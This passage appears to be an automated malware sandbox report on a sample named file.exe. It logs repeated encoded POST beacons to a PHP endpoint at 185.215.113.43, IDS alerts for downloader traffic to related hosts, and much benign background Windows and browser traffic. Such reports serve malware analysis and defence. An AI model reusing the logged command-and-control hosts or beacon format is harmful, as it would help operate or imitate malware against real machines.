Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49779 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:54620 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:54772 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:54788 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:54650 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C75CC60 PR_Recv,

0_2_6C75CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
